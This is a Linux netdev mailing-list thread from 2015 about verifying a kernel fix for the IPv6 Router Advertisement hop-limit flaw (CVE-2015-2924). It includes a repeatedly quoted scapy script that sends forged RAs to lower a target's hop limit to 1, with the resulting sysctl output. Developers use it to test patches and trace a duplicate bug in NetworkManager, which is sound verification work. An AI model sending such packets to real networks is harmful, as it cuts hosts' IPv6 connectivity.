Message ID | 20150401.154847.612566794393812348.davem@davemloft.net |
---|---|
State | Accepted, archived |
Delegated to: | David Miller |
Headers | show |
On Wed, Apr 1, 2015 at 9:48 PM, David Miller <davem@davemloft.net> wrote: > D.S. Ljungmark (1): > ipv6: Don't reduce hop limit for an interface https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6fd99094de2b83d1d4c8457f2c83483b2828e75a I was testing this change and apparently it doesn't close the hole. The python script I use to send RAs: #!/usr/bin/env python import sys import time import scapy.all from scapy.layers.inet6 import * ip = IPv6() # ip.dst = 'ff02::1' ip.dst = sys.argv[1] icmp = ICMPv6ND_RA() icmp.chlim = 1 for x in range(10): send(ip/icmp) time.sleep(1) # ./ipv6-hop-limit.py fe80::21e:37ff:fed0:5006 . Sent 1 packets. ...<10 times>... Sent 1 packets. After I do this, on the targeted machine I check hop_limits: # for f in /proc/sys/net/ipv6/conf/*/hop_limit; do echo -n $f:; cat $f; done /proc/sys/net/ipv6/conf/all/hop_limit:64 /proc/sys/net/ipv6/conf/default/hop_limit:64 /proc/sys/net/ipv6/conf/enp0s25/hop_limit:1 <=== THIS /proc/sys/net/ipv6/conf/lo/hop_limit:64 /proc/sys/net/ipv6/conf/wlp3s0/hop_limit:64 As you see, the interface which received RAs still lowered its hop_limit to 1. I take it means that the bug is still present (right? I'm not a network guy...). I triple-checked that I do run the kernel with the fix. Further investigation shows that the code touched by the fix is not even reached, hop_limit is changed elsewhere. I'm willing to test additional patches. -- To unsubscribe from this list: send the line "unsubscribe netdev" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
On 29/04/15 16:51, Denys Vlasenko wrote: > On Wed, Apr 1, 2015 at 9:48 PM, David Miller <davem@davemloft.net> wrote: >> D.S. Ljungmark (1): >> ipv6: Don't reduce hop limit for an interface > > https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6fd99094de2b83d1d4c8457f2c83483b2828e75a > > I was testing this change and apparently it doesn't close the hole. > > The python script I use to send RAs: > > #!/usr/bin/env python > import sys > import time > import scapy.all > from scapy.layers.inet6 import * > ip = IPv6() > # ip.dst = 'ff02::1' > ip.dst = sys.argv[1] > icmp = ICMPv6ND_RA() > icmp.chlim = 1 > for x in range(10): > send(ip/icmp) > time.sleep(1) > > # ./ipv6-hop-limit.py fe80::21e:37ff:fed0:5006 > . > Sent 1 packets. > ...<10 times>... > Sent 1 packets. > > After I do this, on the targeted machine I check hop_limits: > > # for f in /proc/sys/net/ipv6/conf/*/hop_limit; do echo -n $f:; cat $f; done > /proc/sys/net/ipv6/conf/all/hop_limit:64 > /proc/sys/net/ipv6/conf/default/hop_limit:64 > /proc/sys/net/ipv6/conf/enp0s25/hop_limit:1 <=== THIS > /proc/sys/net/ipv6/conf/lo/hop_limit:64 > /proc/sys/net/ipv6/conf/wlp3s0/hop_limit:64 > > As you see, the interface which received RAs still lowered > its hop_limit to 1. I take it means that the bug is still present > (right? I'm not a network guy...). It might not be present in the _kernel_. Do you run NetworkManager on your system? If so, see below. > > I triple-checked that I do run the kernel with the fix. > Further investigation shows that the code touched by the fix > is not even reached, hop_limit is changed elsewhere. > > I'm willing to test additional patches. NetworkManager had it's own re-implementation of the bug. It got fixed with NetworkManager commit: commit bdaaf9849b0cacf131b71fa2ae168f5db796874f Author: Thomas Haller <thaller@redhat.com> Date: Wed Apr 8 15:54:30 2015 +0200 platform: don't accept lowering IPv6 hop-limit from RA (CVE-2015-2924) Beforte that commit, NetworkManager would take the RA packet, extract the hop limit, and write it to the sysctl itself. //D.S.
On Wed, 2015-04-29 at 17:17 +0200, D.S. Ljungmark wrote: > On 29/04/15 16:51, Denys Vlasenko wrote: > > On Wed, Apr 1, 2015 at 9:48 PM, David Miller <davem@davemloft.net> wrote: > >> D.S. Ljungmark (1): > >> ipv6: Don't reduce hop limit for an interface > > > > https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6fd99094de2b83d1d4c8457f2c83483b2828e75a > > > > I was testing this change and apparently it doesn't close the hole. > > > > The python script I use to send RAs: > > > > #!/usr/bin/env python > > import sys > > import time > > import scapy.all > > from scapy.layers.inet6 import * > > ip = IPv6() > > # ip.dst = 'ff02::1' > > ip.dst = sys.argv[1] > > icmp = ICMPv6ND_RA() > > icmp.chlim = 1 > > for x in range(10): > > send(ip/icmp) > > time.sleep(1) > > > > # ./ipv6-hop-limit.py fe80::21e:37ff:fed0:5006 > > . > > Sent 1 packets. > > ...<10 times>... > > Sent 1 packets. > > > > After I do this, on the targeted machine I check hop_limits: > > > > # for f in /proc/sys/net/ipv6/conf/*/hop_limit; do echo -n $f:; cat $f; done > > /proc/sys/net/ipv6/conf/all/hop_limit:64 > > /proc/sys/net/ipv6/conf/default/hop_limit:64 > > /proc/sys/net/ipv6/conf/enp0s25/hop_limit:1 <=== THIS > > /proc/sys/net/ipv6/conf/lo/hop_limit:64 > > /proc/sys/net/ipv6/conf/wlp3s0/hop_limit:64 > > > > As you see, the interface which received RAs still lowered > > its hop_limit to 1. I take it means that the bug is still present > > (right? I'm not a network guy...). > > It might not be present in the _kernel_. Do you run NetworkManager on > your system? If so, see below. > > > > > I triple-checked that I do run the kernel with the fix. > > Further investigation shows that the code touched by the fix > > is not even reached, hop_limit is changed elsewhere. > > > > I'm willing to test additional patches. > > NetworkManager had it's own re-implementation of the bug. It got fixed > with NetworkManager commit: > > commit bdaaf9849b0cacf131b71fa2ae168f5db796874f > Author: Thomas Haller <thaller@redhat.com> > Date: Wed Apr 8 15:54:30 2015 +0200 > > platform: don't accept lowering IPv6 hop-limit from RA (CVE-2015-2924) > > > > Beforte that commit, NetworkManager would take the RA packet, extract > the hop limit, and write it to the sysctl itself. Yup, we basically followed the original kernel logic here, so we needed to patch it in NM as well. It's been backported to NM 0.9.10, 1.0, and obviously is in git master. Dan -- To unsubscribe from this list: send the line "unsubscribe netdev" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
On 29/04/15 18:50, Dan Williams wrote: > On Wed, 2015-04-29 at 17:17 +0200, D.S. Ljungmark wrote: >> On 29/04/15 16:51, Denys Vlasenko wrote: >>> On Wed, Apr 1, 2015 at 9:48 PM, David Miller <davem@davemloft.net> wrote: >>>> D.S. Ljungmark (1): >>>> ipv6: Don't reduce hop limit for an interface >>> >>> https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6fd99094de2b83d1d4c8457f2c83483b2828e75a >>> >>> I was testing this change and apparently it doesn't close the hole. >>> >>> The python script I use to send RAs: >>> >>> #!/usr/bin/env python >>> import sys >>> import time >>> import scapy.all >>> from scapy.layers.inet6 import * >>> ip = IPv6() >>> # ip.dst = 'ff02::1' >>> ip.dst = sys.argv[1] >>> icmp = ICMPv6ND_RA() >>> icmp.chlim = 1 >>> for x in range(10): >>> send(ip/icmp) >>> time.sleep(1) >>> >>> # ./ipv6-hop-limit.py fe80::21e:37ff:fed0:5006 >>> . >>> Sent 1 packets. >>> ...<10 times>... >>> Sent 1 packets. >>> >>> After I do this, on the targeted machine I check hop_limits: >>> >>> # for f in /proc/sys/net/ipv6/conf/*/hop_limit; do echo -n $f:; cat $f; done >>> /proc/sys/net/ipv6/conf/all/hop_limit:64 >>> /proc/sys/net/ipv6/conf/default/hop_limit:64 >>> /proc/sys/net/ipv6/conf/enp0s25/hop_limit:1 <=== THIS >>> /proc/sys/net/ipv6/conf/lo/hop_limit:64 >>> /proc/sys/net/ipv6/conf/wlp3s0/hop_limit:64 >>> >>> As you see, the interface which received RAs still lowered >>> its hop_limit to 1. I take it means that the bug is still present >>> (right? I'm not a network guy...). >> >> It might not be present in the _kernel_. Do you run NetworkManager on >> your system? If so, see below. >> >>> >>> I triple-checked that I do run the kernel with the fix. >>> Further investigation shows that the code touched by the fix >>> is not even reached, hop_limit is changed elsewhere. >>> >>> I'm willing to test additional patches. >> >> NetworkManager had it's own re-implementation of the bug. It got fixed >> with NetworkManager commit: >> >> commit bdaaf9849b0cacf131b71fa2ae168f5db796874f >> Author: Thomas Haller <thaller@redhat.com> >> Date: Wed Apr 8 15:54:30 2015 +0200 >> >> platform: don't accept lowering IPv6 hop-limit from RA (CVE-2015-2924) >> >> >> >> Beforte that commit, NetworkManager would take the RA packet, extract >> the hop limit, and write it to the sysctl itself. > > Yup, we basically followed the original kernel logic here, so we needed > to patch it in NM as well. It's been backported to NM 0.9.10, 1.0, and > obviously is in git master. > Are there any release announcements for NetworkManager? Or a place to link for official releases/homepage? //D.S.
On Wed, Apr 29, 2015 at 5:17 PM, D.S. Ljungmark <ljungmark@modio.se> wrote: > > On 29/04/15 16:51, Denys Vlasenko wrote: >> # for f in /proc/sys/net/ipv6/conf/*/hop_limit; do echo -n $f:; cat $f; done >> /proc/sys/net/ipv6/conf/all/hop_limit:64 >> /proc/sys/net/ipv6/conf/default/hop_limit:64 >> /proc/sys/net/ipv6/conf/enp0s25/hop_limit:1 <=== THIS >> /proc/sys/net/ipv6/conf/lo/hop_limit:64 >> /proc/sys/net/ipv6/conf/wlp3s0/hop_limit:64 >> >> As you see, the interface which received RAs still lowered >> its hop_limit to 1. I take it means that the bug is still present >> (right? I'm not a network guy...). > > It might not be present in the _kernel_. Do you run NetworkManager on > your system? If so, see below. Yes. "killall -STOP NetworkManager" and now I see that bug is fixed. Sorry for the false alarm. (If anyone would want to reproduce this, NB: be sure to also enable accept_ra* sysctls, otherwise kernel will ignore RAs and bug wouldn't be reproduced on previous kernels too). -- To unsubscribe from this list: send the line "unsubscribe netdev" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
On Wed, 2015-04-29 at 18:55 +0200, D.S. Ljungmark wrote: > > On 29/04/15 18:50, Dan Williams wrote: > > On Wed, 2015-04-29 at 17:17 +0200, D.S. Ljungmark wrote: > >> On 29/04/15 16:51, Denys Vlasenko wrote: > >>> On Wed, Apr 1, 2015 at 9:48 PM, David Miller <davem@davemloft.net> wrote: > >>>> D.S. Ljungmark (1): > >>>> ipv6: Don't reduce hop limit for an interface > >>> > >>> https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6fd99094de2b83d1d4c8457f2c83483b2828e75a > >>> > >>> I was testing this change and apparently it doesn't close the hole. > >>> > >>> The python script I use to send RAs: > >>>- > >>> #!/usr/bin/env python > >>> import sys > >>> import time > >>> import scapy.all > >>> from scapy.layers.inet6 import * > >>> ip = IPv6() > >>> # ip.dst = 'ff02::1' > >>> ip.dst = sys.argv[1] > >>> icmp = ICMPv6ND_RA() > >>> icmp.chlim = 1 > >>> for x in range(10): > >>> send(ip/icmp) > >>> time.sleep(1) > >>> > >>> # ./ipv6-hop-limit.py fe80::21e:37ff:fed0:5006 > >>> . > >>> Sent 1 packets. > >>> ...<10 times>... > >>> Sent 1 packets. > >>> > >>> After I do this, on the targeted machine I check hop_limits: > >>> > >>> # for f in /proc/sys/net/ipv6/conf/*/hop_limit; do echo -n $f:; cat $f; done > >>> /proc/sys/net/ipv6/conf/all/hop_limit:64 > >>> /proc/sys/net/ipv6/conf/default/hop_limit:64 > >>> /proc/sys/net/ipv6/conf/enp0s25/hop_limit:1 <=== THIS > >>> /proc/sys/net/ipv6/conf/lo/hop_limit:64 > >>> /proc/sys/net/ipv6/conf/wlp3s0/hop_limit:64 > >>> > >>> As you see, the interface which received RAs still lowered > >>> its hop_limit to 1. I take it means that the bug is still present > >>> (right? I'm not a network guy...). > >> > >> It might not be present in the _kernel_. Do you run NetworkManager on > >> your system? If so, see below. > >> > >>> > >>> I triple-checked that I do run the kernel with the fix. > >>> Further investigation shows that the code touched by the fix > >>> is not even reached, hop_limit is changed elsewhere. > >>> > >>> I'm willing to test additional patches. > >> > >> NetworkManager had it's own re-implementation of the bug. It got fixed > >> with NetworkManager commit: > >> > >> commit bdaaf9849b0cacf131b71fa2ae168f5db796874f > >> Author: Thomas Haller <thaller@redhat.com> > >> Date: Wed Apr 8 15:54:30 2015 +0200 > >> > >> platform: don't accept lowering IPv6 hop-limit from RA (CVE-2015-2924) > >> > >> > >> > >> Beforte that commit, NetworkManager would take the RA packet, extract > >> the hop limit, and write it to the sysctl itself. > > > > Yup, we basically followed the original kernel logic here, so we needed > > to patch it in NM as well. It's been backported to NM 0.9.10, 1.0, and > > obviously is in git master. > > > > Are there any release announcements for NetworkManager? Or a place to > link for official releases/homepage? The mailing list: https://mail.gnome.org/mailman/listinfo/networkmanager-list The project site: https://wiki.gnome.org/Projects/NetworkManager Dan -- To unsubscribe from this list: send the line "unsubscribe netdev" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html